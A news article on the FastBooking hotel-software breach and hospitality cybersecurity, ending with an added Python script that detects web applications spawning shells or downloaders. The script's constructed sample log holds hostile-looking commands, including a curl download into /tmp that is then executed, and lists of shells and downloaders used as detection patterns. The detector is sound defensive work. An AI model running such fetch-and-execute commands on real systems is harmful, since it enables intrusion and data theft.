FastBooking, a Paris-based company that sells hotel booking software, was robbed of customers’ personal information and credit card data. The company sent out emails last week warning those affected among its 4,000 customers in 100 countries.
The breach, which took place on June 14, is the latest warning sign that the hospitality industry needs to take action. An attacker exploited a vulnerability in FastBooking’s software to install malware. That gave the attacker remote access to the company’s server.
Ian Eyber, owner of Nanovms, a company that makes attack-preventing software, says the hospitality industry is at significantly more risk than other industries for data theft. Because more than just credit card numbers are collected from customers, hotel booking data is highly valued.
“Also, much of the traditional means of booking and other hospitality-specific software is moving to newer web-based applications that, while they may be newer, suffer from web application-style vulnerabilities,” Eyber says.
FastBooking runs its software on the open-source Linux operating system. “I think it’s very common for developers that deploy to Linux systems to think they are ‘secure enough’ from malware, because they aren’t running Windows,” Eyber says. “It might be better, but it still suffers from the same vulnerability of being a multiple-process system—that is, [it can] run multiple programs [at the same time] instead of just the one that should be running.”
A Promised Fix
Eyber says a new technology does address the problem. Nanovms sells unikernel applications—as do several other companies—that do not need a general-purpose operating system such as Linux or Windows.
Typical software application systems often have “shells”—programs that power a command-line interface—that contain code hackers can use to hijack the system. Or attackers will abuse a system call, the mechanism by which a program asks the operating system to perform a certain task.
Unikernels have neither, says Eyber. The technology combines the application and the operating system into a single image that runs only that one program. This makes it nearly impossible for attackers to invade, because other programs, such as malware, have no entry point through which to run.
“Many remote code-execution attacks rely on the capability of running other ad-hoc commands on the targeted system or downloading new software to be run on that system,” Eyber says.
Hotels Fall Victim
The hotel industry has felt the shockwaves from cyberattacks in recent years. Major chains such as InterContinental Hotels and Hyatt Hotels have fallen victim, resulting in large monetary reparations and the loss of trust from thousands of customers.
Steve Oates is the director of SAVIT group and specializes in IT and cybersecurity. In a recent LinkedIn article, Oates notes that an attack has repercussions beyond the financial.
“A breach will erode the confidence in your brand,” Oates said. “Depending on the level of the attack and the extent of the news coverage, your brand can be permanently damaged. After an attack, even if you put the necessary safeguards in place, customers might never know about them. People are willing to forgive a business for being a victim of a crime, but they are less likely to forgive a business for being negligent toward them.”
Solving the Predicament
His prescription? Oates suggested promoting a “culture of security” and educating employees on digital security the same way a company would for physical security. Hiring a chief information security officer (CISO) can also be a positive step toward ensuring continuous monitoring, he says.
Besides credit card attacks, the industry is at risk from other tactics, including ransomware. This attack exploits a vulnerability in the system, or arrives through malicious files and links, and encrypts data to completely lock down devices. The attacker will then demand payment, often in the form of Bitcoin, to relinquish control. In the meantime, all hotel operations can be frozen. Property managers will not be able to see reservation details, make financial transactions or create electronic keys.
Oates’ article reports that ransomware rose 250 percent in 2017. HospitalityTech.com categorizes the phenomenon as an “industry.” The website advises brands to act quickly by isolating the infected network of devices, then temporarily removing unaffected computers to stop the problem from spreading.
Eyber urges companies to give priority to the security of management systems over the convenience of their use.
“Web application software has been for some time eating into traditional desktop-based software environments for lots of good reasons, like centralizing data and making updates easier to apply,” Eyber says. “Unfortunately, if certain precautions are not taken, web applications are just as vulnerable as desktop applications are. A good start is ensuring that only the application that should be running is able to run. It should not be possible to run attackers’ code on your system.”
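Eyber’s two points above, that remote code-execution attacks typically depend on running ad-hoc commands or fetching new software onto the server, and that a good start is making sure only the intended application can run, translate directly into a detection policy on a conventional Linux host. The script below is an added example written for this article; it is not NanoVMs’ code or anything FastBooking ran. It assumes a constructed one-line-per-process-execution log format (`ppid=… parent=… pid=… comm=… argv="…"`), a hypothetical set of web-facing processes and a per-process allowlist of expected children; it flags a web application process that spawns a shell or downloader, a child outside the allowlist, or any program executed from a world-writable directory. The sample events are constructed.

```python
"""
Added example: flag a web application process that executes ad-hoc
commands, downloaders, or binaries from world-writable directories.

Input format (constructed for this example, not a real tool's log format):
one process-execution event per line, as key=value pairs, e.g.
  ppid=812 parent=php-fpm pid=902 comm=sh argv="sh -c id"
"""
from __future__ import annotations

import shlex
from dataclasses import dataclass

# Processes that serve the web application (constructed assumption).
WEB_APP_PROCESSES = {"nginx", "php-fpm", "gunicorn", "uwsgi", "node"}

# Children each web-app process is expected to spawn (constructed allowlist;
# in practice this comes from a baseline of the real deployment).
EXPECTED_CHILDREN = {
    "nginx": {"php-fpm"},
    "php-fpm": {"convert"},  # e.g. image resizing via ImageMagick
}

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
DOWNLOADERS = {"curl", "wget"}
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


@dataclass
class ExecEvent:
    pid: int
    ppid: int
    parent: str
    comm: str
    argv: list[str]


@dataclass
class Finding:
    pid: int
    parent: str
    comm: str
    severity: str
    reason: str


def parse_event(line: str) -> ExecEvent:
    """Parse one key=value event line; shlex keeps the quoted argv together."""
    fields: dict[str, str] = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        fields[key] = value
    return ExecEvent(
        pid=int(fields["pid"]),
        ppid=int(fields["ppid"]),
        parent=fields["parent"],
        comm=fields["comm"],
        argv=fields["argv"].split(),
    )


def classify(event: ExecEvent) -> Finding | None:
    """Return a Finding if the event violates the expected-process policy."""
    program = event.argv[0] if event.argv else event.comm
    if program.startswith(WRITABLE_DIRS):
        return Finding(event.pid, event.parent, event.comm, "high",
                       "executed a binary from a world-writable directory")
    if event.parent not in WEB_APP_PROCESSES:
        return None  # the policy only covers the web-facing processes
    if event.comm in SHELLS:
        return Finding(event.pid, event.parent, event.comm, "high",
                       "web application spawned a shell")
    if event.comm in DOWNLOADERS:
        return Finding(event.pid, event.parent, event.comm, "high",
                       "web application launched a downloader")
    if event.comm not in EXPECTED_CHILDREN.get(event.parent, set()):
        return Finding(event.pid, event.parent, event.comm, "medium",
                       "child process not in the allowlist")
    return None


def analyze(lines) -> list[Finding]:
    """Run the policy over every non-empty event line, in order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        finding = classify(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample: one benign child, a shell, a download into /tmp,
# execution of that download, an unrelated daemon, an allowlisted child,
# and an unexpected archiver under the web app.
SAMPLE_EVENTS = """
ppid=812 parent=php-fpm pid=901 comm=convert argv="convert in.jpg -resize 200x200 out.jpg"
ppid=812 parent=php-fpm pid=902 comm=sh argv="sh -c id"
ppid=812 parent=php-fpm pid=903 comm=curl argv="curl -s http://example.invalid/tool -o /tmp/tool"
ppid=812 parent=php-fpm pid=904 comm=tool argv="/tmp/tool"
ppid=1 parent=systemd pid=905 comm=sshd argv="/usr/sbin/sshd -D"
ppid=501 parent=nginx pid=906 comm=php-fpm argv="php-fpm: pool www"
ppid=812 parent=php-fpm pid=907 comm=tar argv="tar czf /tmp/db.tgz /var/www/db"
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS.splitlines()):
        print(f"[{f.severity}] pid={f.pid} {f.parent} -> {f.comm}: {f.reason}")
```

The allowlist is the part that encodes Eyber’s principle: anything the web-facing process runs that is not on the expected list is reported, with the shell, downloader and writable-directory cases escalated because they are the steps an injected command typically needs. The same rules are a reasonable starting point for an auditd or eBPF exec-event feed once the parser is swapped for the real format.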